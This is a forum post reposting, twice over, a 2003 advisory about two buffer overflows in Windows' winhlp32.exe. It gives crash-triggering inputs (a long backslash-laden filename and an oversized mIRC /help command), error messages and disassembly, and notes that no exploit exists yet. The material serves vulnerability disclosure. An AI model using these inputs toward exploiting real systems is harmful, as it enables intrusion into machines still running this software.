NI3
11-01-2003, 05:18 PM
hi all
---
Winhlp32.exe 5.1.2600.1106 buffer overflow
=
=
= Affected Software:
= Microsoft Windows nt 4.0
= Microsoft Windows 2000
= Microsoft Windows Xp
=
= by Dr_insane ([Only registered and activated users can see links])
= [Only registered and activated users can see links]
=
================================================== =========================================
Two buffer overflows have been discovered in winhlp32.exe that affect all version of Windows.
Winhlp32.exe cannot handle some long filenames and some strange path names and as a result it will crash.
The vulnerabilities may allow arbitrary code to be run on a Windows NT machine.
Description:
------------
[1] The first buffer overflow occurs when winhlp32.exe attempts to open a strange long filename.If the filename is
about 259 bytes winhlp32.exe will crash by producing an error message.
[2]The second buffer overflow occurs when try to run winhlp32.exe via mirc.
Exploit:
---------
[1] Open winhlp32.exe and insert as a filename the following string:
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a \a\a\a\a\a\a\a\a\a\a
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a \a\a\a\a\a\a\a\a\a\a
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a \a\a\a\a\a\a\a\a\a\a
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a
Most of times winhlp32 will crash and the following error message will be produced:
(sometimes instead of crashing the open window will just dissapear!)
"The instruction at "0x631b3597" referenced memory at "0x000fb964".The memory could't be "read".
By disassembling winhlp32.exe we get:
"Unhandled exception in winhlp32.exe (SHLWAPI.dll): 0xC0000005: Access violation"
631B3599 xor edx,edx
631B359B test ecx,ecx
631B359D je 631B35CB
631B359F mov ax,word ptr [ecx]
631B35A2 test ax,ax
631B35A5 je 631B35CB
631B35A7 movzx eax,ax
631B35AA cmp eax,20h
*****The character "\" makes the trick.******
[2] The second buffer overflow occurs when we open MIRC and supply the following command:
/help * [325 characters]
Mirc will call the file winhlp32.exe and will try to open the file specified (325 chars in our case).
Winhlp32.exe will crash again and the error message will be:
"The instruction at "0x0102fd40" referenced memory at "0x61616161".The memory could't be "WRITTEN".
By disassembling winhlp32.exe we get:
"Unhandled exception in winhlp32.exe (SHLWAPI.dll): 0xC0000005: Access violation"
0102FD40 mov dword ptr [ecx],1002AF4h
0102FD46 call 0102E8D2
0102FD4B ret
0102FD4C cmp dword ptr [esp+8],0
0102FD51 jne 0102FD57
pr00f of concept exploit:
--------------------------
Not yet
== Credit ==
Dr_insane
[Only registered and activated users can see links]
----
---
Winhlp32.exe 5.1.2600.1106 buffer overflow
=
=
= Affected Software:
= Microsoft Windows nt 4.0
= Microsoft Windows 2000
= Microsoft Windows Xp
=
= by Dr_insane ([Only registered and activated users can see links])
= [Only registered and activated users can see links]
=
================================================== =========================================
Two buffer overflows have been discovered in winhlp32.exe that affect all version of Windows.
Winhlp32.exe cannot handle some long filenames and some strange path names and as a result it will crash.
The vulnerabilities may allow arbitrary code to be run on a Windows NT machine.
Description:
------------
[1] The first buffer overflow occurs when winhlp32.exe attempts to open a strange long filename.If the filename is
about 259 bytes winhlp32.exe will crash by producing an error message.
[2]The second buffer overflow occurs when try to run winhlp32.exe via mirc.
Exploit:
---------
[1] Open winhlp32.exe and insert as a filename the following string:
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a \a\a\a\a\a\a\a\a\a\a
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a \a\a\a\a\a\a\a\a\a\a
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a \a\a\a\a\a\a\a\a\a\a
\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a
Most of times winhlp32 will crash and the following error message will be produced:
(sometimes instead of crashing the open window will just dissapear!)
"The instruction at "0x631b3597" referenced memory at "0x000fb964".The memory could't be "read".
By disassembling winhlp32.exe we get:
"Unhandled exception in winhlp32.exe (SHLWAPI.dll): 0xC0000005: Access violation"
631B3599 xor edx,edx
631B359B test ecx,ecx
631B359D je 631B35CB
631B359F mov ax,word ptr [ecx]
631B35A2 test ax,ax
631B35A5 je 631B35CB
631B35A7 movzx eax,ax
631B35AA cmp eax,20h
*****The character "\" makes the trick.******
[2] The second buffer overflow occurs when we open MIRC and supply the following command:
/help * [325 characters]
Mirc will call the file winhlp32.exe and will try to open the file specified (325 chars in our case).
Winhlp32.exe will crash again and the error message will be:
"The instruction at "0x0102fd40" referenced memory at "0x61616161".The memory could't be "WRITTEN".
By disassembling winhlp32.exe we get:
"Unhandled exception in winhlp32.exe (SHLWAPI.dll): 0xC0000005: Access violation"
0102FD40 mov dword ptr [ecx],1002AF4h
0102FD46 call 0102E8D2
0102FD4B ret
0102FD4C cmp dword ptr [esp+8],0
0102FD51 jne 0102FD57
pr00f of concept exploit:
--------------------------
Not yet
== Credit ==
Dr_insane
[Only registered and activated users can see links]
----